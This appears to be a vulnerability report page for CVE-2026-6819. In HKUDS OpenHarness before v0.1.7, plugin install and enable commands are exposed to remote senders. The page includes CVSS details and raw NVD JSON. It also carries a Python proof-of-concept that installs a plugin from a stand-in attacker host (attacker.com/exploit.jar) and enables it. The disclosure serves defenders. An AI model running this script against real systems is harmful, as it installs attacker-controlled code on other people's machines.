Security Vulnerability Report
中文
CVE-2026-6819 CVSS 8.8 HIGH

CVE-2026-6819

Published: 2026-04-21 20:17:06
Last Modified: 2026-05-07 20:28:15
Source: [email protected]

Description

HKUDS OpenHarness prior to PR #156 remediation exposes plugin lifecycle commands including /plugin install, /plugin enable, /plugin disable, and /reload-plugins to remote senders by default. Attackers who gain access through the channel layer can remotely manage plugin trust and activation state, enabling unauthorized plugin installation and activation on the system.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hkuds:openharness:*:*:*:*:*:*:*:* - VULNERABLE
HKUDS OpenHarness < v0.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url, malicious_plugin_url): # Exploit concept: Send plugin install command headers = {'Content-Type': 'application/json'} # Step 1: Install the malicious plugin payload_install = { "command": "/plugin install", "args": [malicious_plugin_url] } print(f"[*] Sending install command to {target_url}...") r1 = requests.post(target_url, json=payload_install, headers=headers) print(f"[+] Install response: {r1.status_code}") # Step 2: Enable the plugin # Assuming the plugin name is derived or known, e.g., 'evil-plugin' payload_enable = { "command": "/plugin enable", "args": ["evil-plugin"] } print(f"[*] Sending enable command...") r2 = requests.post(target_url, json=payload_enable, headers=headers) print(f"[+] Enable response: {r2.status_code}") if __name__ == "__main__": target = "http://127.0.0.1:8080/api/command" evil_jar = "http://attacker.com/exploit.jar" exploit(target, evil_jar)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6819", "sourceIdentifier": "[email protected]", "published": "2026-04-21T20:17:05.780", "lastModified": "2026-05-07T20:28:15.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HKUDS OpenHarness prior to PR #156 remediation exposes plugin lifecycle commands including /plugin install, /plugin enable, /plugin disable, and /reload-plugins to remote senders by default. Attackers who gain access through the channel layer can remotely manage plugin trust and activation state, enabling unauthorized plugin installation and activation on the system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hkuds:openharness:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.1.7", "matchCriteriaId": "9C7CA6F6-AD0C-4BAF-8E67-793ABBC9F1BC"}]}]}], "references": [{"url": "https://github.com/HKUDS/OpenHarness/commit/59017e09880fcf9a6f60456a84fb982900b2c0b2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/HKUDS/OpenHarness/pull/156", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/HKUDS/OpenHarness/releases/tag/v0.1.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/hkuds-openharness-plugin-management-command-exposure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/HKUDS/OpenHarness/pull/156", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.